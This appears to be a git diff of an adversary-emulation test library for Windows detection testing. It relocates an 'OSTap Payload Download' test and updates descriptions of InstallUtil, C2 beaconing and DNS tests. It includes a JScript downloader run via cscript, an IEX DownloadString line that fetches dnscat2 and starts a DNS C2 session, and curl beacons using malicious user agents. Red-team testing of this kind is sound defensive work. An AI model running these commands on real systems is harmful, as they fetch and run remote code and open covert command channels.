diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 582bac4c..d57deb74 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -534,8 +534,9 @@ execution,T1151,Space after Filename,1,Space After Filename
execution,T1154,Trap,1,Trap
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
-execution,T1204,User Execution,2,Maldoc choice flags command execution
-execution,T1204,User Execution,3,OSTAP JS version
+execution,T1204,User Execution,2,OSTap Payload Download
+execution,T1204,User Execution,3,Maldoc choice flags command execution
+execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -637,7 +638,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
-command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index b1ff1f86..6329bf54 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -410,8 +410,9 @@ execution,T1216,Signed Script Proxy Execution,2,SyncAppvPublishingServer Signed
execution,T1216,Signed Script Proxy Execution,3,manage-bde.wsf Signed Script Command Execution
execution,T1127,Trusted Developer Utilities,1,MSBuild Bypass Using Inline Tasks
execution,T1204,User Execution,1,OSTap Style Macro Execution
-execution,T1204,User Execution,2,Maldoc choice flags command execution
-execution,T1204,User Execution,3,OSTAP JS version
+execution,T1204,User Execution,2,OSTap Payload Download
+execution,T1204,User Execution,3,Maldoc choice flags command execution
+execution,T1204,User Execution,4,OSTAP JS version
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes
execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software
@@ -440,7 +441,6 @@ command-and-control,T1071,Standard Application Layer Protocol,4,DNS Large Query
command-and-control,T1071,Standard Application Layer Protocol,5,DNS Regular Beaconing
command-and-control,T1071,Standard Application Layer Protocol,6,DNS Long Domain Query
command-and-control,T1071,Standard Application Layer Protocol,7,DNS C2
-command-and-control,T1071,Standard Application Layer Protocol,8,OSTap Payload Download
command-and-control,T1032,Standard Cryptographic Protocol,1,OpenSSL C2
command-and-control,T1095,Standard Non-Application Layer Protocol,1,ICMP C2
command-and-control,T1095,Standard Non-Application Layer Protocol,2,Netcat C2
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 519d1c17..19542d47 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -810,8 +810,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- - Atomic Test #2: Maldoc choice flags command execution [windows]
- - Atomic Test #3: OSTAP JS version [windows]
+ - Atomic Test #2: OSTap Payload Download [windows]
+ - Atomic Test #3: Maldoc choice flags command execution [windows]
+ - Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -986,7 +987,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- - Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index bd589e3f..942514ee 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -676,8 +676,9 @@
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- [T1204 User Execution](../../T1204/T1204.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- - Atomic Test #2: Maldoc choice flags command execution [windows]
- - Atomic Test #3: OSTAP JS version [windows]
+ - Atomic Test #2: OSTap Payload Download [windows]
+ - Atomic Test #3: Maldoc choice flags command execution [windows]
+ - Atomic Test #4: OSTAP JS version [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -728,7 +729,6 @@
- Atomic Test #5: DNS Regular Beaconing [windows]
- Atomic Test #6: DNS Long Domain Query [windows]
- Atomic Test #7: DNS C2 [windows]
- - Atomic Test #8: OSTap Payload Download [windows]
- [T1032 Standard Cryptographic Protocol](../../T1032/T1032.md)
- Atomic Test #1: OpenSSL C2 [windows]
- [T1095 Standard Non-Application Layer Protocol](../../T1095/T1095.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 9fbdb301..48eb7c8a 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -9143,10 +9143,9 @@ defense-evasion:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
- description: 'Executes the CheckIfInstallable class constructor runner instead
- of executing InstallUtil.
-
-'
+ description: |
+ Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+ If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -9208,10 +9207,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
- description: 'Executes the InstallHelper class constructor runner instead of
- executing InstallUtil.
-
-'
+ description: |
+ Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+ executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -9275,7 +9273,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
- description: 'Executes the installer assembly class constructor.
+ description: 'Executes the installer assembly class constructor. Upon execution,
+ version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9341,7 +9340,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
- description: 'Executes the Install Method
+ description: 'Executes the Install Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9407,7 +9407,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9474,7 +9475,8 @@ defense-evasion:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -9540,7 +9542,8 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, help information
+ will be displayed for InstallUtil.
'
supported_platforms:
@@ -9606,10 +9609,9 @@ defense-evasion:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
- description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
- using a nonstandard extension for the assembly.
-
-'
+ description: |
+ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+ will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -22380,10 +22382,9 @@ execution:
identifier: T1118
atomic_tests:
- name: CheckIfInstallable method call
- description: 'Executes the CheckIfInstallable class constructor runner instead
- of executing InstallUtil.
-
-'
+ description: |
+ Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+ If no output is displayed the test executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22445,10 +22446,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallHelper method call
- description: 'Executes the InstallHelper class constructor runner instead of
- executing InstallUtil.
-
-'
+ description: |
+ Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+ executed successfuly.
supported_platforms:
- windows
input_arguments:
@@ -22512,7 +22512,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil class constructor method call
- description: 'Executes the installer assembly class constructor.
+ description: 'Executes the installer assembly class constructor. Upon execution,
+ version information will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22578,7 +22579,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Install method call
- description: 'Executes the Install Method
+ description: 'Executes the Install Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22644,7 +22646,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - /U variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22711,7 +22714,8 @@ execution:
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall'
variant
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, version information
+ will be displayed the .NET framework install utility.
'
supported_platforms:
@@ -22777,7 +22781,8 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil HelpText method call
- description: 'Executes the Uninstall Method
+ description: 'Executes the Uninstall Method. Upon execution, help information
+ will be displayed for InstallUtil.
'
supported_platforms:
@@ -22843,10 +22848,9 @@ execution:
$InstallerAssemblyFullPath = Join-Path -Path $InstallerAssemblyDir -ChildPath $InstallerAssemblyFileName
Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
- name: InstallUtil evasive invocation
- description: 'Executes an InstallUtil assembly by renaming InstallUtil.exe and
- using a nonstandard extension for the assembly.
-
-'
+ description: |
+ Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+ will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
supported_platforms:
- windows
input_arguments:
@@ -25322,12 +25326,13 @@ execution:
identifier: T1204
atomic_tests:
- name: OSTap Style Macro Execution
- description: "This Test uses a VBA macro to create and execute #{jse_path} with
- cscript.exe. The .jse file in turn launches wscript.exe.\nExecution is handled
- by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
- to load and execute VBA code into Excel or Word documents.\n\nThis is a known
- execution chain observed by the OSTap downloader commonly used in TrickBot
- campaigns \nReferences:\n https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader\n"
+ description: |
+ This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
+ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
+
+ This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
+ References:
+ https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader
supported_platforms:
- windows
input_arguments:
@@ -25364,6 +25369,30 @@ execution:
cleanup_command: |
if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ - name: OSTap Payload Download
+ description: 'Uses cscript //E:jscript to download a file
+
+'
+ supported_platforms:
+ - windows
+ input_arguments:
+ script_file:
+ description: File to execute jscript code from
+ type: Path
+ default: "%TEMP%\\OSTapGet.js"
+ file_url:
+ description: URL to retrieve file from
+ type: Url
+ default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
+ executor:
+ name: command_prompt
+ elevation_required: false
+ command: |
+ echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
+ cscript //E:Jscript #{script_file}
+ cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
+
+'
- name: Maldoc choice flags command execution
description: |
This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
@@ -25400,9 +25429,9 @@ execution:
'
- name: OSTAP JS version
- description: "Malicious JavaScript executing CMD which spaws wscript.exe //e:jscript
- \nExecution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1)
- to load and execute VBA code into Excel or Word documents.\n"
+ description: |
+ Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
+ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
supported_platforms:
- windows
input_arguments:
@@ -29425,9 +29454,10 @@ command-and-control:
identifier: T1071
atomic_tests:
- name: Malicious User Agents - Powershell
- description: |
- This test simulates an infected host beaconing to command and control.
- Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+ description: "This test simulates an infected host beaconing to command and
+ control. Upon execution, no output will be displayed. \nUse an application
+ such as Wireshark to record the session and observe user agent strings and
+ responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
@@ -29444,9 +29474,10 @@ command-and-control:
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
- name: Malicious User Agents - CMD
- description: |
- This test simulates an infected host beaconing to command and control.
- Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
+ description: "This test simulates an infected host beaconing to command and
+ control. Upon execution, no out put will be displayed. \nUse an application
+ such as Wireshark to record the session and observe user agent strings and
+ responses.\n\nInspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat\n"
supported_platforms:
- windows
input_arguments:
@@ -29457,10 +29488,10 @@ command-and-control:
executor:
name: command_prompt
command: |
- curl -s -A "HttpBrowser/1.0" -m3 #{domain}
- curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
- curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
- curl -s -A "*<|>*" -m3 #{domain}
+ curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
+ curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
+ curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
+ curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
- name: Malicious User Agents - Nix
description: |
This test simulates an infected host beaconing to command and control.
@@ -29484,6 +29515,7 @@ command-and-control:
description: |
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
+ A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29515,6 +29547,7 @@ command-and-control:
description: |
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
+ A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29547,12 +29580,13 @@ command-and-control:
name: powershell
elevation_required: false
command: |
- Set-Location $PathToAtomicsFolder
+ Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
- name: DNS Long Domain Query
description: |
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
+ Upon execution, DNS information about the domain will be displayed for each callout.
supported_platforms:
- windows
input_arguments:
@@ -29573,13 +29607,15 @@ command-and-control:
name: powershell
elevation_required: false
command: |
- Set-Location $PathToAtomicsFolder
+ Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
- name: DNS C2
description: |
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
+
https://github.com/iagox86/dnscat2
+
https://github.com/lukebaggett/dnscat2-powershell
supported_platforms:
- windows
@@ -29599,30 +29635,6 @@ command-and-control:
command: |
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/45836819b2339f0bb64eaf294f8cc783635e00c6/dnscat2.ps1')
Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
- - name: OSTap Payload Download
- description: 'Uses cscript //E:jscript to download a file
-
-'
- supported_platforms:
- - windows
- input_arguments:
- script_file:
- description: File to execute jscript code from
- type: Path
- default: "%TEMP%\\OSTapGet.js"
- file_url:
- description: URL to retrieve file from
- type: Url
- default: https://128.30.52.100/TR/PNG/iso_8859-1.txt
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
- cscript //E:Jscript #{script_file}
- cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
-
-'
T1032:
technique:
x_mitre_data_sources:
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index d11484d6..eb8ad788 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -20,13 +20,13 @@ For connections that occur internally within an enclave (such as those between a
- [Atomic Test #7 - DNS C2](#atomic-test-7---dns-c2)
-- [Atomic Test #8 - OSTap Payload Download](#atomic-test-8---ostap-payload-download)
-
## Atomic Test #1 - Malicious User Agents - Powershell
-This test simulates an infected host beaconing to command and control.
+This test simulates an infected host beaconing to command and control. Upon execution, no output will be displayed.
+Use an application such as Wireshark to record the session and observe user agent strings and responses.
+
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -59,7 +59,9 @@ Invoke-WebRequest #{domain} -UserAgent "*<|>*" | out-null
## Atomic Test #2 - Malicious User Agents - CMD
-This test simulates an infected host beaconing to command and control.
+This test simulates an infected host beaconing to command and control. Upon execution, no out put will be displayed.
+Use an application such as Wireshark to record the session and observe user agent strings and responses.
+
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
**Supported Platforms:** Windows
@@ -77,10 +79,10 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
```cmd
-curl -s -A "HttpBrowser/1.0" -m3 #{domain}
-curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
-curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
-curl -s -A "*<|>*" -m3 #{domain}
+curl -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1
+curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain} >nul 2>&1
+curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain} >nul 2>&1
+curl -s -A "*<|>*" -m3 #{domain} >nul 2>&1
```
@@ -127,6 +129,7 @@ curl -s -A "*<|>*" -m3 #{domain}
## Atomic Test #4 - DNS Large Query Volume
This test simulates an infected host sending a large volume of DNS queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DNS queries either from a single source system or to a single targe domain.
+A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -160,6 +163,7 @@ for($i=0; $i -le #{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}"
## Atomic Test #5 - DNS Regular Beaconing
This test simulates an infected host beaconing via DNS queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
+A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -181,7 +185,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
```powershell
-Set-Location $PathToAtomicsFolder
+Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -196,6 +200,7 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #6 - DNS Long Domain Query
This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DNS queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DNS queries for long domain names over a set threshold.
+ Upon execution, DNS information about the domain will be displayed for each callout.
**Supported Platforms:** Windows
@@ -214,7 +219,7 @@ The simulation involves sending DNS queries that gradually increase in length un
```powershell
-Set-Location $PathToAtomicsFolder
+Set-Location PathToAtomicsFolder
.\T1071\src\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
@@ -229,7 +234,9 @@ Set-Location $PathToAtomicsFolder
## Atomic Test #7 - DNS C2
This will attempt to start a C2 session using the DNS protocol. You will need to have a listener set up and create DNS records prior to executing this command.
The following blogs have more information.
+
https://github.com/iagox86/dnscat2
+
https://github.com/lukebaggett/dnscat2-powershell
**Supported Platforms:** Windows
@@ -257,39 +264,4 @@ Start-Dnscat2 -Domain #{domain} -DNSServer #{server_ip}
-
-
-
-## Atomic Test #8 - OSTap Payload Download
-Uses cscript //E:jscript to download a file
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js|
-| file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt|
-
-
-#### Attack Commands: Run with `command_prompt`!
-
-
-```cmd
-echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
-cscript //E:Jscript #{script_file}
-```
-
-#### Cleanup Commands:
-```cmd
-del #{script_file} /F /Q >nul 2>&1
-```
-
-
-
-
-
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md
index 7e2df9ab..86dc19fb 100644
--- a/atomics/T1118/T1118.md
+++ b/atomics/T1118/T1118.md
@@ -26,7 +26,8 @@ Adversaries may use InstallUtil to proxy execution of code through a trusted Win
## Atomic Test #1 - CheckIfInstallable method call
-Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil.
+Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed.
+If no output is displayed the test executed successfuly.
**Supported Platforms:** Windows
@@ -101,7 +102,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call
-Executes the InstallHelper class constructor runner instead of executing InstallUtil.
+Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test
+executed successfuly.
**Supported Platforms:** Windows
@@ -178,7 +180,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call
-Executes the installer assembly class constructor.
+Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -255,7 +257,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call
-Executes the Install Method
+Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -332,7 +334,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -409,7 +411,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility.
**Supported Platforms:** Windows
@@ -486,7 +488,7 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call
-Executes the Uninstall Method
+Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil.
**Supported Platforms:** Windows
@@ -563,7 +565,8 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation
-Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly.
+Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation."
+will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion.
**Supported Platforms:** Windows
diff --git a/atomics/T1204/T1204.md b/atomics/T1204/T1204.md
index 7b7158ac..c34afee9 100644
--- a/atomics/T1204/T1204.md
+++ b/atomics/T1204/T1204.md
@@ -10,9 +10,11 @@ While User Execution frequently occurs shortly after Initial Access it may occur
- [Atomic Test #1 - OSTap Style Macro Execution](#atomic-test-1---ostap-style-macro-execution)
